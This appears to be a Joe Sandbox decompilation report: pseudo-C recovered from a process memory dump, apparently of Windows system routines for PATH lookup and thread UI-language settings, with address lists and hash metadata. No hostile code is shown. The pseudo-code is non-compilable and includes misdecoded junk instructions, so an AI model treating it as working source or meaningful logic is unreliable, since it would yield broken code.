											switch( *((intOrPtr*)(_t243 * 4 +  &M04612959))) {
												case 0:
													__ax =  *0x46d8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0462F3E0(__edi,  *0x46d848c, __ax & 0x0000ffff);
														__eax =  *0x46d8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0462F3E0(_t332, _v80, _v64);
													_t278 = _v64;
													goto L26;
												case 2:
													 *0x46d8480 & 0x0000ffff = E0462F3E0(__edi,  *0x46d8484,  *0x46d8480 & 0x0000ffff);
													__eax =  *0x46d8480 & 0x0000ffff;
													__eax = ( *0x46d8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0462F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0462F3E0(_t332, _v76, _v36);
														_t278 = _v36;
													}
													L26:
													_t347 = _t347 + 0xc;
													_t332 = _t332 + (_t278 >> 1) * 2 + 2;
													__eflags = _t332;
													L27:
													_push(0x3b);
													_pop(_t280);
													 *((short*)(_t332 - 2)) = _t280;
													goto L28;
												case 6:
													__ebx = "\\WIw\\WIw";
													__eflags = __ebx - "\\WIw\\WIw";
													if(__ebx != "\\WIw\\WIw") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0462F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\WIw\\WIw";
														} while (__ebx != "\\WIw\\WIw");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x46d8478 & 0x0000ffff = E0462F3E0(__edi,  *0x46d847c,  *0x46d8478 & 0x0000ffff);
													__eax =  *0x46d8478 & 0x0000ffff;
													__eax = ( *0x46d8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E046739F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x46d6e58 & 0x0000ffff = E0462F3E0(__edi,  *0x46d6e5c,  *0x46d6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x46d6e58 & 0x0000ffff;
													__eax = ( *0x46d6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t303 = _v16;
													_t319 = _v32;
													L29:
													_t293 = _t293 + 4;
													__eflags = _t293;
													_v56 = _t293;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t303 = _t303 + 1;
									_v16 = _t303;
									__eflags = _t303 - _v48;
								} while (_t303 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t243 =  *(_v60 + _t330 * 4);
						if(_t243 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t243 * 4 +  &M04612935))) {
							case 0:
								__ax =  *0x46d8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t319 =  &_v64;
								_v80 = E04612E3E(0,  &_v64);
								_t289 = _t289 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x46d8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x46d8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E045FEEF0(0x46d79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E045FEB70(__ecx, 0x46d79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t217 = _v72;
											__eflags = _t217;
											if(_t217 != 0) {
												L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
											}
											_t218 = _v52;
											__eflags = _t218;
											if(_t218 != 0) {
												__eflags = _t338;
												if(_t338 < 0) {
													L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
													_t218 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t299 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x46d7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L04604620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E045FEB70(__ecx, 0x46d79a0);
										__eax = _v52;
										L36:
										_pop(_t331);
										_pop(_t339);
										__eflags = _v8 ^ _t343;
										_pop(_t290);
										return E0462B640(_t218, _t290, _v8 ^ _t343, _t319, _t331, _t339);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t285 = _v56;
								if(_v56 != 0) {
									_t319 =  &_v36;
									_t287 = E04612E3E(_t285,  &_v36);
									_t299 = _v36;
									_v76 = _t287;
								}
								if(_t299 == 0) {
									goto L44;
								} else {
									_t289 = _t289 + 2 + _t299;
								}
								goto L14;
							case 6:
								__eax =  *0x46d5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x46d8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x46d8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x46d6e58 & 0x0000ffff;
								__eax = ( *0x46d6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t330 = _t330 + 1;
								if(_t330 >= _v48) {
									goto L16;
								} else {
									_t319 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t304 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("popad");
					_t244 = _t243 + 0x66;
					 *((intOrPtr*)(_t304 + 4)) =  *((intOrPtr*)(_t304 + 4)) - _t244;
					asm("loopne 0x29");
					asm("popad");
					asm("popad");
					_t246 = _t244 + 0x74;
					 *((intOrPtr*)(_t304 + 4)) =  *((intOrPtr*)(_t304 + 4)) - _t246;
					_t248 = _t246 + 0x1f0461ba;
					 *((intOrPtr*)(_t304 + 4)) =  *((intOrPtr*)(_t304 + 4)) - _t248;
					_t249 = _t248 ^ 0x0204655b;
					 *((intOrPtr*)(_t304 + 4)) =  *((intOrPtr*)(_t304 + 4)) - _t347;
					 *_t249 =  *_t249 - 0x61;
					asm("daa");
					asm("popad");
					_t251 = _t249 + 0x114;
					 *((intOrPtr*)(_t304 + 4)) =  *((intOrPtr*)(_t304 + 4)) - _t251;
					_t340 = _t337 - 1;
					 *((intOrPtr*)(_t304 + 4)) =  *((intOrPtr*)(_t304 + 4)) - _t251;
					asm("daa");
					asm("popad");
					_pop(_t295);
					 *((intOrPtr*)(_t304 + 4)) =  *((intOrPtr*)(_t304 + 4)) - _t251 + 0x18c;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x46bff00);
					E0463D08C(_t295, _t332, _t340);
					_v44 =  *[fs:0x18];
					_t333 = 0;
					 *_a24 = 0;
					_t296 = _a12;
					__eflags = _t296;
					if(_t296 == 0) {
						_t258 = 0xc0000100;
					} else {
						_v8 = 0;
						_t341 = 0xc0000100;
						_v52 = 0xc0000100;
						_t260 = 4;
						while(1) {
							_v40 = _t260;
							__eflags = _t260;
							if(_t260 == 0) {
								break;
							}
							_t309 = _t260 * 0xc;
							_v48 = _t309;
							__eflags = _t296 -  *((intOrPtr*)(_t309 + 0x45c1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t275 = E0462E5C0(_a8,  *((intOrPtr*)(_t309 + 0x45c1668)), _t296);
									_t347 = _t347 + 0xc;
									__eflags = _t275;
									if(__eflags == 0) {
										_t341 = E046651BE(_t296,  *((intOrPtr*)(_v48 + 0x45c166c)), _a16, _t333, _t341, __eflags, _a20, _a24);
										_v52 = _t341;
										break;
									} else {
										_t260 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t260 = _t260 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t341;
						__eflags = _t341;
						if(_t341 < 0) {
							__eflags = _t341 - 0xc0000100;
							if(_t341 == 0xc0000100) {
								_t305 = _a4;
								__eflags = _t305;
								if(_t305 != 0) {
									_v36 = _t305;
									__eflags =  *_t305 - _t333;
									if( *_t305 == _t333) {
										_t341 = 0xc0000100;
										goto L76;
									} else {
										_t321 =  *((intOrPtr*)(_v44 + 0x30));
										_t262 =  *((intOrPtr*)(_t321 + 0x10));
										__eflags =  *((intOrPtr*)(_t262 + 0x48)) - _t305;
										if( *((intOrPtr*)(_t262 + 0x48)) == _t305) {
											__eflags =  *(_t321 + 0x1c);
											if( *(_t321 + 0x1c) == 0) {
												L106:
												_t341 = E04612AE4( &_v36, _a8, _t296, _a16, _a20, _a24);
												_v32 = _t341;
												__eflags = _t341 - 0xc0000100;
												if(_t341 != 0xc0000100) {
													goto L69;
												} else {
													_t333 = 1;
													_t305 = _v36;
													goto L75;
												}
											} else {
												_t265 = E045F6600( *(_t321 + 0x1c));
												__eflags = _t265;
												if(_t265 != 0) {
													goto L106;
												} else {
													_t305 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t341 = E04612C50(_t305, _a8, _t296, _a16, _a20, _a24, _t333);
											L76:
											_v32 = _t341;
											goto L69;
										}
									}
									goto L108;
								} else {
									E045FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t341 = _a24;
									_t272 = E04612AE4( &_v36, _a8, _t296, _a16, _a20, _t341);
									_v32 = _t272;
									__eflags = _t272 - 0xc0000100;
									if(_t272 == 0xc0000100) {
										_v32 = E04612C50(_v36, _a8, _t296, _a16, _a20, _t341, 1);
									}
									_v8 = _t333;
									E04612ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t258 = _t341;
					}
					L70:
					return E0463D0D1(_t258);
				}
				L108:
			}

0x04612584
0x04612586
0x04612590
0x04612596
0x04612597
0x04612598
0x04612599
0x0461259e
0x046125a4
0x046125a9
0x046125ac
0x046125ae
0x046125b1
0x046125b2
0x046125b5
0x046125b8
0x046125bb
0x046125bc
0x046125bf
0x046125c2
0x046125c5
0x046125c6
0x046125cb
0x046125ce
0x046125d8
0x046125db
0x046125dd
0x046125de
0x046125e1
0x046125e3
0x046125e9
0x046126da
0x046126da
0x046126dd
0x046126e2
0x04655b56
0x00000000
0x046126e8
0x046126f9
0x046126fb
0x046126fe
0x04612700
0x04655b60
0x00000000
0x04612706
0x04612706
0x0461270a
0x0461270a
0x0461270d
0x04612713
0x04612716
0x04612718
0x0461271c
0x0461271e
0x04655b6c
0x04655b6f
0x04655b7f
0x04655b89
0x04655b8e
0x04655b93
0x04655b96
0x04655b9c
0x04655ba0
0x04655ba3
0x04655bab
0x04655bb0
0x04655bb3
0x04655bb3
0x04655ba3
0x04612724
0x04612726
0x04612729
0x0461272c
0x0461279d
0x0461279d
0x046127a0
0x046127a2
0x00000000
0x0461272e
0x0461272e
0x04612731
0x04612734
0x04612734
0x04612736
0x04655bc1
0x04655bc1
0x04655bc4
0x00000000
0x04655bca
0x04655bca
0x04655bcd
0x00000000
0x04655bd3
0x00000000
0x04655bd3
0x04655bcd
0x0461273c
0x0461273c
0x04612742
0x04612747
0x0461274a
0x0461274d
0x04612750
0x00000000
0x04612756
0x04612756
0x00000000
0x04612902
0x04612908
0x0461290b
0x00000000
0x04612911
0x0461291c
0x04612921
0x00000000
0x04612921
0x00000000
0x00000000
0x04612880
0x04612887
0x0461288c
0x00000000
0x00000000
0x04612805
0x0461280a
0x04612814
0x04612816
0x00000000
0x00000000
0x0461281e
0x04612821
0x04612823
0x00000000
0x04612829
0x04612829
0x04612831
0x0461283c
0x0461283e
0x00000000
0x0461283e
0x00000000
0x00000000
0x0461284e
0x04612850
0x04612851
0x04612854
0x04612857
0x0461285a
0x0461285c
0x0461285d
0x00000000
0x00000000
0x0461275d
0x04612761
0x00000000
0x04612767
0x0461276e
0x04612773
0x04612773
0x04612776
0x04612778
0x0461277e
0x0461277e
0x04612781
0x04612781
0x04612783
0x04612784
0x00000000
0x00000000
0x04655bd8
0x04655bde
0x04655be4
0x04655be6
0x04655be8
0x04655be9
0x04655bee
0x04655bf8
0x04655bff
0x04655c01
0x04655c04
0x04655c07
0x04655c0b
0x04655c0d
0x04655c0d
0x04655c15
0x04655c18
0x04655c1b
0x04655c1b
0x04655c1e
0x00000000
0x00000000
0x046128c3
0x046128c8
0x046128d2
0x046128d4
0x046128d8
0x046128db
0x04655c26
0x04655c28
0x04655c2d
0x04655c2d
0x00000000
0x00000000
0x04655c34
0x04655c36
0x04655c49
0x04655c4e
0x04655c54
0x04655c5b
0x04655c5d
0x04655c60
0x04612788
0x04612788
0x0461278b
0x0461278e
0x0461278e
0x0461278e
0x04612791
0x00000000
0x00000000
0x04612756
0x04612750
0x00000000
0x04612794
0x04612794
0x04612795
0x04612798
0x04612798
0x00000000
0x04612734
0x0461272c
0x04612700
0x046125ef
0x046125ef
0x046125ef
0x046125f2
0x046125f8
0x00000000
0x00000000
0x046125fe
0x00000000
0x046128e6
0x046128ec
0x046128ef
0x046128f5
0x046128f8
0x046128f8
0x00000000
0x046128f8
0x00000000
0x00000000
0x04612866
0x04612866
0x04612876
0x04612879
0x00000000
0x00000000
0x046127e0
0x046127e7
0x046127e9
0x046127eb
0x04655afd
0x00000000
0x04655afd
0x00000000
0x00000000
0x04612633
0x04612638
0x0461263b
0x0461263c
0x0461263e
0x04612640
0x04612642
0x04612647
0x04612649
0x0461264e
0x04612650
0x04612653
0x04612659
0x046126a2
0x046126a7
0x046126ac
0x046126b2
0x04655b11
0x04655b15
0x04655b17
0x00000000
0x046126b8
0x046126b8
0x046126ba
0x046127a6
0x046127a6
0x046127a9
0x046127ab
0x046127b9
0x046127b9
0x046127be
0x046127c1
0x046127c3
0x046127c5
0x046127c7
0x04655c74
0x04655c79
0x04655c79
0x046127c7
0x00000000
0x046126c0
0x046126c0
0x046126c3
0x046126c6
0x046126c6
0x046126c9
0x046126c9
0x00000000
0x046126c9
0x046126ba
0x0461265b
0x0461265b
0x0461265e
0x04612667
0x0461266d
0x04612677
0x0461267c
0x0461267f
0x04612681
0x04655b49
0x04655b4e
0x046127cd
0x046127d0
0x046127d1
0x046127d2
0x046127d4
0x046127dd
0x04612687
0x04612687
0x0461268a
0x0461268b
0x0461268e
0x0461268f
0x04612691
0x04612696
0x04612698
0x0461269d
0x0461269f
0x00000000
0x0461269f
0x04612681
0x00000000
0x00000000
0x04612846
0x00000000
0x00000000
0x04612605
0x0461260a
0x0461260c
0x04612611
0x04612616
0x04612619
0x04612619
0x0461261e
0x00000000
0x04612624
0x04612627
0x04612627
0x00000000
0x00000000
0x04655b1f
0x00000000
0x00000000
0x04612894
0x0461289b
0x0461289d
0x046128a1
0x04655b2b
0x04655b2e
0x04655b2e
0x046128a7
0x046128a9
0x04655b04
0x04655b09
0x04655b09
0x04655b09
0x00000000
0x00000000
0x04655b35
0x04655b3c
0x046128fb
0x046128fb
0x046126cc
0x046126cc
0x046126d0
0x00000000
0x046126d2
0x046126d2
0x00000000
0x046126d2
0x00000000
0x00000000
0x046125fe
0x0461292d
0x0461292f
0x04612930
0x04612935
0x04612937
0x04612938
0x0461293a
0x0461293d
0x0461293f
0x04612942
0x04612944
0x04612946
0x0461294f
0x04612952
0x04612955
0x0461295a
0x0461295d
0x04612962
0x04612963
0x04612964
0x04612966
0x04612969
0x0461296a
0x0461296e
0x0461296f
0x04612972
0x04612976
0x0461297e
0x0461297f
0x04612980
0x04612981
0x04612982
0x04612983
0x04612984
0x04612985
0x04612986
0x04612987
0x04612988
0x04612989
0x0461298a
0x0461298b
0x0461298c
0x0461298d
0x0461298e
0x0461298f
0x04612990
0x04612992
0x04612997
0x046129a3
0x046129a6
0x046129ab
0x046129ad
0x046129b0
0x046129b2
0x04655c80
0x046129b8
0x046129b8
0x046129bb
0x046129c0
0x046129c5
0x046129c6
0x046129c6
0x046129c9
0x046129cb
0x00000000
0x00000000
0x046129cd
0x046129d0
0x046129d9
0x046129db
0x046129dd
0x04612a7f
0x04612a84
0x04612a87
0x04612a89
0x04655ca1
0x04655ca3
0x00000000
0x04612a8f
0x04612a8f
0x00000000
0x04612a8f
0x00000000
0x046129e3
0x046129e3
0x046129e3
0x00000000
0x046129e3
0x046129dd
0x00000000
0x046129db
0x046129e6
0x046129e9
0x046129eb
0x046129ed
0x046129f3
0x046129f5
0x046129f8
0x046129fa
0x04612a97
0x04612a9a
0x04612a9d
0x04612add
0x00000000
0x04612a9f
0x04612aa2
0x04612aa5
0x04612aa8
0x04612aab
0x04655cab
0x04655caf
0x04655cc5
0x04655cda
0x04655cdc
0x04655cdf
0x04655ce5
0x00000000
0x04655ceb
0x04655ced
0x04655cee
0x00000000
0x04655cee
0x04655cb1
0x04655cb4
0x04655cb9
0x04655cbb
0x00000000
0x04655cbd
0x04655cbd
0x00000000
0x04655cbd
0x04655cbb
0x04612ab1
0x04612ab1
0x04612ac4
0x04612ac6
0x04612ac6
0x00000000
0x04612ac6
0x04612aab
0x00000000
0x04612a00
0x04612a09
0x04612a0e
0x04612a21
0x04612a24
0x04612a35
0x04612a3a
0x04612a3d
0x04612a42
0x04612a59
0x04612a59
0x04612a5c
0x04612a5f
0x04612a5f
0x046129fa
0x046129f3
0x04612a64
0x04612a64
0x04612a6b
0x04612a6b
0x04612a6d
0x04612a72
0x04612a72
0x00000000

Strings

PATH, xrefs: 04612642, 04612691

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 617703bb275c31eac20b0e48edfcc350509dd9b80cdc693787bb34be57cbc488
Instruction ID: a4ee418ff3920d585ad69527071d04df3a358b66dbbe6863f1b2b1a98f8ed528
Opcode Fuzzy Hash: 617703bb275c31eac20b0e48edfcc350509dd9b80cdc693787bb34be57cbc488
Instruction Fuzzy Hash: 9DC16F71E00219EFDB14DF99D890AAEB7B1FF48714F084069E901BB260F734B942DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0461FAB0 Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0461FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E045FEEF0(0x46d7b60);
					_t134 =  *0x46d7b84; // 0x77497b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x46d7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x46d7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E045F6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E045F76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E04688938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E045EB150();
													}
													_t116 = E04686D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E045F75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x46d8638; // 0xa0ee20
																	_t122 = L045F38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E045F76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E045F76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0461FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L045F70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0461FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0461FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0461FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0461FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0461FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x46d7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x46d7b84 = _t75;
						_t73 = E045FEB70(_t134, 0x46d7b60);
